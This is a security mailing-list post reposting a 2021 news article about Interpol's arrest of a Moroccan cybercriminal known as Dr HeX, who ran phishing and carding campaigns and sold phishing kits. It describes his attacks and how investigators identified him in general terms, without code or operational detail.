[BreachExchange] Interpol Arrests Moroccan Hacker Engaged in Nefarious Cyber Activities

Wed Jul 7 10:29:07 EDT 2021

https://thehackernews.com/2021/07/interpol-arrests-hacker-in-morocco-who.html

Law enforcement authorities with the Interpol have apprehended a threat
actor responsible for targeting thousands of unwitting victims over several
years and staging malware attacks on telecom companies, major banks, and
multinational corporations in France as part of a global phishing and
credit card fraud scheme.

The two-year investigation, dubbed Operation Lyrebird by the international,
intergovernmental organization, resulted in the arrest of a Moroccan
citizen nicknamed Dr HeX, cybersecurity firm Group-IB disclosed today in a
report shared with The Hacker News.

Dr HeX is said to have been "active since at least 2009 and is responsible
for a number of cybercrimes, including phishing, defacing, malware
development, fraud, and carding that resulted in thousands of unsuspecting
victims," the cybersecurity firm said.

The cyber attacks involved deploying a phishing kit consisting of web pages
that spoofed banking entities in the country, followed by sending mass
emails mimicking the targeted companies, prompting email recipients to
enter login information on the rogue website.

The credentials entered by unsuspecting victims on the fake web page were
then redirected to the perpetrator's email. At least three different
phishing kits presumably developed by the threat actor have been extracted.

The phishing kits were also "sold to other individuals through online
forums to allow them to facilitate similar malicious campaigns against
victims," Interpol said in a statement. "These were then used to
impersonate online banking facilities, allowing the suspect and others to
steal sensitive information and defraud trusting individuals for financial
gain, with the losses of individuals and companies published online in
order to advertise these malicious services."

The scripts included in the phishing kit contained the name Dr HeX and the
individual's contact email address, using which the cybercriminal was
eventually identified and deanonymized, in the process uncovering a YouTube
channel as well as another name used by the adversary to register at least
two fraudulent domains that were used in the attacks.

Additionally, Group-IB said it was also able to map the email address to
the malicious infrastructure employed by the accused in various phishing
campaigns, of which included as many as five email addresses, six
nicknames, and his accounts on Skype, Facebook, Instagram, and YouTube.

In all, Dr Hex's digital footprint left a tell-tale trail of malicious
activities over a period stretching between 2009 and 2018, during when the
threat actor defaced no fewer than 134 web pages, along with finding posts
created by the attacker on different underground forums devoted to malware
trading and evidence suggesting his involvement in attacks on French
corporations to steal financial information.

"The suspect, in particular, promoted so-called Zombi Bot, which allegedly
contained 814 exploits, including 72 private ones, a brute-forcer, webshell
and backdoor scanners, as well as functionality to carry out DDoS attacks,"
Group-IB CTO Dmitry Volkov told The Hacker News.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20210707/28d6fb50/attachment.html>